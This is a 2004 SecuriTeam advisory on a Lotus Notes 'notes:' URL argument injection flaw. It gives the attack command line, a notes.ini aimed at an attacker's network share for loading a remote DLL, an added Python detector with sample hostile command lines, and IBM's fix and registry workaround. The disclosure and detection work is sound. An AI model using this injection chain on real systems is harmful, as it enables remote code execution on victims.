[NT] Lotus Notes URL Argument Injection Vulnerability
From: SecuriTeam (support_at_securiteam.com)
Date: 06/29/04
To: list@securiteam.com Date: 29 Jun 2004 09:41:31 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
Lotus Notes URL Argument Injection Vulnerability
------------------------------------------------------------------------
SUMMARY
Lotus Notes is "a groupware/e-mail system developed by Lotus Software. Due
to its security and collaboration features it's used particularly by large
organizations, government agencies, etc. IBM estimates it is used by 60
million people".
During the client-side Windows installation of Lotus Notes, a "notes:" URL
handler is registered in the registry. An argument injection attack allows
an intruder to pass command line arguments to notes.exe, which can lead to
execution of arbitrary code.
DETAILS
The installed registry entry causes any "notes:" URL to be opened with
notes.exe and the URL passed as the argument. If the URL contains space
characters, notes.exe takes the characters after that as a second command
line argument. Any web page can cause notes.exe to be started in this way
by referring to a notes: URL.
The location of the Notes configuration file, notes.ini, can be specified
on the command line by prefixing it with an equals sign (=). The notes.ini file
can be located on a network share. An attacker can use the URL to specify
an arbitrary notes.ini file located on a public network share, so that the
command run when opening the URL would be e.g.
    notes.exe =\\attacker.server\notes\notes.ini
The notes.ini file contains the location of the Notes data directory, which
in this case can also be located on a public network share. The notes.ini
file could contain e.g.
    [Notes]
    Directory=\\attacker.server\\notes
The program uses this directory to load some dynamic libraries. The
attacker can place arbitrary code in the init section of such a DLL and
cause it to be run during notes.exe startup. The scenario was successfully
tested with an exploit. On opening the malicious web page, the victim
system downloaded the DLL and ran the code in it.
The exploit requires that notes.exe isn't already running while the victim
views the malicious web page or e-mail message, because DLLs are only
loaded on program startup. It also requires that outgoing connections to
Internet-based shares are not blocked by firewalls or registry settings.
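The following check is an added example, not code from the advisory or from IBM. It flags notes.exe command lines in which an "="-prefixed argument names a notes.ini on a network share, and a notes.ini whose Directory entry points at a share; the sample command lines, the install path and the finding names are constructed for illustration.

```python
import configparser
import re

# Constructed process-creation command lines (assumed install path).
SAMPLE_CMDLINES = [
    r'"C:\Lotus\Notes\notes.exe" notes://server/db.nsf',
    r'"C:\Lotus\Notes\notes.exe" notes://x =\\attacker.server\notes\notes.ini',
    r'C:\Lotus\Notes\notes.exe "=C:\Lotus\Notes\notes.ini"',
]

def split_args(cmdline):
    """Split on whitespace, keeping double-quoted runs together."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]

def is_unc(path):
    """True for \\\\host\\share style paths (either slash direction)."""
    return path.startswith("\\\\") or path.startswith("//")

def audit_cmdline(cmdline):
    """Return a list of findings for one notes.exe command line."""
    args = split_args(cmdline)
    if not args or not args[0].lower().endswith("notes.exe"):
        return []
    findings = []
    from_url = any(a.lower().startswith("notes:") for a in args[1:])
    for a in args[1:]:
        if a.startswith("="):  # '=' prefix selects the notes.ini file
            if is_unc(a[1:]):
                findings.append("ini-on-network-share")
            if from_url:
                # A URL launch should carry the URL and nothing else.
                findings.append("ini-argument-beside-notes-url")
    return findings

def audit_ini(text):
    """Flag a [Notes] Directory= value that points at a network share."""
    cp = configparser.ConfigParser(interpolation=None, strict=False,
                                   allow_no_value=True)
    cp.read_string(text)
    directory = cp.get("Notes", "Directory", fallback="") or ""
    return ["data-directory-on-network-share"] if is_unc(directory) else []

if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        print(audit_cmdline(line), line)
```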
Solution:
IBM was contacted on March 17, 2004. The fix SPR# KSPR5X6VEA has now been
released to solve the issue. As a workaround, the registry key
    HKEY_CLASSES_ROOT\Notes\Shell\Open\Command
can be removed.
ADDITIONAL INFORMATION
The information has been provided by <mailto:jouko@iki.fi> Jouko
Pynnonen.